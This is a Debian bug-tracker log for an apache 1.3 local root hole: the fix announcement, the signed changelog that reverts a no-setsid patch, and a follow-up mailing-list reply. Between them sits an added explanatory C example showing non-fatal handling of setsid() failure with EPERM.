From: Matthew Johnson <debian@matthew.ath.cx>
To: 357561-close@bugs.debian.org
Subject: Bug#357561: fixed in apache 1.3.34-4.1
Date: Sun, 04 Mar 2007 02:47:03 +0000
Source: apache
Source-Version: 1.3.34-4.1

We believe that the bug you reported is fixed in the latest version of
apache, which is due to be installed in the Debian FTP archive:

apache-common_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache-common_1.3.34-4.1_i386.deb
apache-dbg_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache-dbg_1.3.34-4.1_i386.deb
apache-dev_1.3.34-4.1_all.deb
  to pool/main/a/apache/apache-dev_1.3.34-4.1_all.deb
apache-doc_1.3.34-4.1_all.deb
  to pool/main/a/apache/apache-doc_1.3.34-4.1_all.deb
apache-perl_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache-perl_1.3.34-4.1_i386.deb
apache-ssl_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache-ssl_1.3.34-4.1_i386.deb
apache_1.3.34-4.1.diff.gz
  to pool/main/a/apache/apache_1.3.34-4.1.diff.gz
apache_1.3.34-4.1.dsc
  to pool/main/a/apache/apache_1.3.34-4.1.dsc
apache_1.3.34-4.1_i386.deb
  to pool/main/a/apache/apache_1.3.34-4.1_i386.deb
libapache-mod-perl_1.29.0.4-4.1_i386.deb
  to pool/main/a/apache/libapache-mod-perl_1.29.0.4-4.1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 357561@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Matthew Johnson <debian@matthew.ath.cx> (supplier of updated apache package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Fri, 23 Feb 2007 11:37:58 +0000
Source: apache
Binary: apache-dev apache-common apache-doc apache apache-dbg apache-perl apache-ssl libapache-mod-perl
Architecture: source i386 all
Version: 1.3.34-4.1
Distribution: unstable
Urgency: low
Maintainer: Debian Apache Maintainers <debian-apache@lists.debian.org>
Changed-By: Matthew Johnson <debian@matthew.ath.cx>
Description: 
 apache     - versatile, high-performance HTTP server
 apache-common - support files for all Apache webservers
 apache-dbg - debug versions of the Apache webservers
 apache-dev - development kit for the Apache webserver
 apache-doc - documentation for the Apache webserver
 apache-perl - versatile, high-performance HTTP server with Perl support
 apache-ssl - versatile, high-performance HTTP server with SSL support
 libapache-mod-perl - integration of perl with the Apache web server
Closes: 357561
Changes: 
 apache (1.3.34-4.1) unstable; urgency=low
 .
   * Non-Maintainer Upload.
   * Revert 033_-F_NO_SETSID patch and re-fix #244857 in such a way that a
     local root hole is not created (Closes: #357561)
Files: 
 e27b358ed7ec919c5bd09a41def20950 1086 web optional apache_1.3.34-4.1.dsc
 79cc70f1e4e87870350a7380ea69a0b0 352555 web optional apache_1.3.34-4.1.diff.gz
 f7e645919117152b607af2edbf16d80b 1195920 doc optional apache-doc_1.3.34-4.1_all.deb
 22e5342357ef629c0bf4883054bfd1b8 333196 devel extra apache-dev_1.3.34-4.1_all.deb
 4dea161f9e084ea5401fab72b6b14b6b 391546 web optional apache_1.3.34-4.1_i386.deb
 071048620aacb308fc1e32cec750aaab 495578 web optional apache-ssl_1.3.34-4.1_i386.deb
 7422fc04219409db5746111ff09ad772 509832 web optional apache-perl_1.3.34-4.1_i386.deb
 7719dda4ad7c973fc94bca3a7548435c 8820208 devel extra apache-dbg_1.3.34-4.1_i386.deb
 7afb9b0e07218cdb584219360a6ef8b6 848416 web optional apache-common_1.3.34-4.1_i386.deb
 55a3d44ec1c84e0e5b0c92564f83de82 485840 perl optional libapache-mod-perl_1.29.0.4-4.1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFF6ivXipBneRiAKDwRAkp/AJ933S6O4xY34E/+WzFFn6g3dGFF3gCbBP6n
X5NY8Hud36HIoI3Zua7uhRg=
=YQJc
-----END PGP SIGNATURE-----
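The changelog entry above only says that #244857 was re-fixed "in such a way that a local root hole is not created". The mechanism behind both the original breakage and the fix is a documented rule of setsid(2): it fails with EPERM when the calling process is already a process-group leader, which is exactly the state of a server started in foreground mode (the `-F` case named in the reverted patch) that calls setsid() without a preceding fork(). The C program below is an added example written for this page; it is not code from the Debian apache package or from any message in this log. The function names `setsid_warn_and_continue`, `probe_setsid` and `detach_from_tty` are my own. It reproduces the success and the EPERM case in throwaway child processes, so the calling process's own session is never changed, and shows the non-fatal handling of the failure: the controlling terminal is only dropped by a successful setsid(), which is why a fork() must come first on the daemon path and why a failed call is something to log rather than a reason to exit.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Non-fatal handling of setsid(): returns 0 when a new session was created,
 * otherwise the errno value (EPERM when the caller already leads a process
 * group). The caller keeps running either way. */
int setsid_warn_and_continue(void)
{
    if (setsid() == (pid_t)-1) {
        int err = errno;
        fprintf(stderr, "warning: setsid() failed: %s; continuing without "
                        "a new session\n", strerror(err));
        return err;
    }
    return 0;
}

/* Run the wrapper in a child so this process's session stays untouched.
 * make_leader != 0 first calls setpgid(0, 0), which makes the child a
 * process-group leader: the same state a process is in when it skips the
 * fork() and calls setsid() directly.
 * Returns the child's result (0 or errno), or -1 if the child was lost. */
int probe_setsid(int make_leader)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (make_leader && setpgid(0, 0) != 0)
            _exit(255);                  /* could not set up the scenario */
        _exit(setsid_warn_and_continue() & 0xff);
    }
    int status;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* The daemon path: fork() first, so the surviving child is guaranteed not to
 * be a group leader; its setsid() then succeeds and it ends up in a new
 * session with no controlling terminal. In foreground mode the fork is
 * skipped and a failed setsid() is reported, not treated as fatal. */
int detach_from_tty(int foreground)
{
    if (!foreground) {
        pid_t pid = fork();
        if (pid < 0)
            return -1;
        if (pid > 0)
            _exit(0);                    /* parent leaves; the child carries on */
    }
    return setsid_warn_and_continue();
}

int main(void)
{
    /* A freshly forked child is never a group leader: setsid() succeeds. */
    printf("fresh child, setsid():  %d (0 = new session)\n", probe_setsid(0));
    /* A group leader gets EPERM, and the wrapper just reports it. */
    printf("group leader, setsid(): %d (%d = EPERM)\n", probe_setsid(1), EPERM);
    return 0;
}
```

Running the program prints `0` for the first probe and the value of `EPERM` (1 on Linux) for the second; the warning from the second child appears on stderr. The difference between the two outcomes is the whole bug: exiting on the EPERM case is what the reverted patch worked around, and replacing setsid() with a call that does not drop the controlling terminal is what reintroduced the tty-based local root risk.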




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Michelle Konzack <linux4michelle@freenet.de>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #125 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Michelle Konzack <linux4michelle@freenet.de>
To: Moritz Muehlenhoff <jmm@inutil.org>, 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Mon, 5 Mar 2007 17:25:04 +0100
Am 2007-03-02 00:33:56, schrieb Moritz Muehlenhoff:
> Indeed, I'm quite disappointed about apache 1.3 still being in Etch.
> Debian is the _only_ distribution still shipping it; the maintainers
> couldn't provide _any_ valid reason to still include it (like an important
> module not ported to 2.x) and claimed that they would provide all security
> updates for 1.3 issues. Well...

Because 1.3 is, on a Sempron 2200+ with 3 GByte of memory and
over 400 VHosts using php5, several times faster than apache2?

2.0 would force me to an unnecessary mainboard, CPU and memory
upgrade...

Thanks, Greetings and nice Day
    Michelle Konzack
    Systemadministrator
    Tamay Dogan Network
    Debian GNU/Linux Consultant


-- 
Linux-User #280138 with the Linux Counter, http://counter.li.org/
##################### Debian GNU/Linux Consultant #####################
Michelle Konzack   Apt. 917                  ICQ #328449886
                   50, rue de Soultz         MSM LinuxMichi
0033/6/61925193    67100 Strasbourg/France   IRC #Debian (irc.icq.com)

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 26 Jun 2007 03:38:46 GMT) (full text, mbox, link).



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Thu Mar 28 14:28:22 2024; Machine Name: bembo
